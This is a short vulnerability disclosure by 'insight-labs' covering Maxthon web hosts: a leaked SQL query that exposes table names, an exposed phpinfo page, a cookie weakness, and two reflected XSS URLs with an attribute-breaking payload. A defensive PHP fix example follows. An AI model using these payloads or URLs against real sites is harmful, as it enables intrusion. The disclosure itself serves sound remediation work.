1. SQL error leak (table, column)
2. phpinfo
3. Apache httpOnly Cookie
4. XSS

1. SQL error leak (table, column)
http://help.maxthon.cn//view.php?cid=214&tid=9
Query Error: SELECT * FROM help_contentindex i LEFT JOIN help_content c USING(tid) WHERE i.tid='9' AND cid='214'

2. phpinfo
http://help.maxthon.cn//test.php

3. Apache httpOnly Cookie Vuln
help.maxthon.cn

4. XSS
http://tuan.maxthon.cn:80//dianping/index.php?request=site&sid=547&type=" onmouseover=alert(/insight/) bad="
http://tuan.maxthon.cn//Search/?Page=5&Value=" onmouseover=alert(/insight/) bad="

Fix:
1. Don't print error messages
2. Remove the file
3. Upgrade the web server
4. Filter input

Author: insight-labs
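
Fixes 1 and 4 sketched in PHP, as an added example (not code from the affected site or from the author). The table and column names come from the leaked query on this page; the function names `fetch_help_content` and `attr`, the `<input>` markup and the sample value are assumptions.

```php
<?php
// Fix 1: never send database or PHP errors to the client; log them instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Fix 4 (query side): accept only positive integers for tid/cid and bind them.
// Assumes PDO in exception mode (PDO::ERRMODE_EXCEPTION, the default since PHP 8.0).
function fetch_help_content(PDO $db, $tid, $cid): ?array
{
    $opts = ['options' => ['min_range' => 1]];
    $tid = filter_var($tid, FILTER_VALIDATE_INT, $opts);
    $cid = filter_var($cid, FILTER_VALIDATE_INT, $opts);
    if ($tid === false || $cid === false) {
        return null; // malformed input never reaches the database
    }
    try {
        $stmt = $db->prepare(
            'SELECT * FROM help_contentindex i LEFT JOIN help_content c USING(tid)
             WHERE i.tid = :tid AND cid = :cid'
        );
        $stmt->execute([':tid' => $tid, ':cid' => $cid]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    } catch (PDOException $e) {
        // The query text and table names stay in the server log only.
        error_log('help query failed: ' . $e->getMessage());
        return null; // caller renders a generic error page
    }
}

// Fix 4 (output side): encode quotes so a value cannot close its attribute.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed input with the same shape as the reported XSS strings.
$type = '" onmouseover=alert(/insight/) bad="';
echo '<input name="type" value="' . attr($type) . '">', PHP_EOL;
// The double quotes are emitted as &quot;, so no new attribute is created.
```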